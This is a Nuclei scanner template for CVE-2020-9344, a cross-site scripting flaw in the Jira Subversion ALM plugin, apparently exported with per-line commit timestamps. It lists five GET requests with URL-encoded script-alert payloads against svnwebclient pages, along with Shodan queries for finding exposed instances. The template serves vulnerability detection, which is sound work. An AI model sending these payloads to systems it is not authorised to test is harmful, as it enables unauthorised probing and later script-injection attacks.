2021-01-02 04:56:15 +00:00
id : CVE-2020-9344
2020-10-23 06:29:51 +00:00
info :
2022-09-08 13:28:46 +00:00
name : Jira Subversion ALM for Enterprise <8.8.2 - Cross-Site Scripting
2020-10-23 06:29:51 +00:00
author : madrobot
severity : medium
2022-09-08 13:28:46 +00:00
description : Jira Subversion ALM for Enterprise before 8.8.2 contains a cross-site scripting vulnerability at multiple locations.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
2023-09-06 12:22:36 +00:00
remediation : |
Upgrade Jira Subversion ALM for Enterprise to version 8.8.2 or later to mitigate this vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-03-24 06:56:49 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9344
- https://kintosoft.atlassian.net/wiki/spaces/SVNALM/pages/753565697/Security+Bulletin
- https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-007.txt
2022-09-08 13:28:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-13483
2024-03-23 09:28:19 +00:00
- https://github.com/merlinepedra/nuclei-templates
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-9344
cwe-id : CWE-79
2023-07-26 06:26:52 +00:00
epss-score : 0.00205
2024-05-31 19:23:20 +00:00
epss-percentile : 0.58449
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:atlassian:subversion_application_lifecycle_management:*:*:*:*:*:*:*:*
2022-07-04 13:17:40 +00:00
metadata :
2023-07-26 06:26:52 +00:00
verified : true
2023-09-06 12:22:36 +00:00
max-request : 5
2023-08-31 11:46:18 +00:00
vendor : atlassian
product : subversion_application_lifecycle_management
2024-06-07 10:04:29 +00:00
shodan-query :
- http.component:"Atlassian Jira"
- http.component:"atlassian jira"
2024-01-14 09:21:50 +00:00
tags : cve2020,cve,atlassian,jira,xss
2020-10-23 06:29:51 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-10-23 06:29:51 +00:00
- method : GET
path :
- '{{BaseURL}}/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
- '{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS'
- '{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
- '{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test'
- '{{BaseURL}}/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
2023-07-11 19:49:27 +00:00
2020-10-23 06:29:51 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2020-10-23 06:29:51 +00:00
words :
- "<script>alert(document.domain)</script>"
2023-07-26 06:26:52 +00:00
- "jira"
- "subversion"
condition : and
case-insensitive : true
2020-12-13 19:24:23 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : header
2020-12-13 19:24:23 +00:00
words :
- "text/html"
2023-07-11 19:49:27 +00:00
- type : status
status :
2023-08-31 11:46:18 +00:00
- 200
2024-06-08 16:02:17 +00:00
# digest: 4a0a0047304502210096a7f8441fad6ef464b1b1062531a31f18b31793c22d91bf36d7c5d9c46fcad3022000f112053e665b73ef0d3bd5a51fee2177fb3199074560ebf449dceeaa60ce80:922c64590222798bb761d5b6d8e72950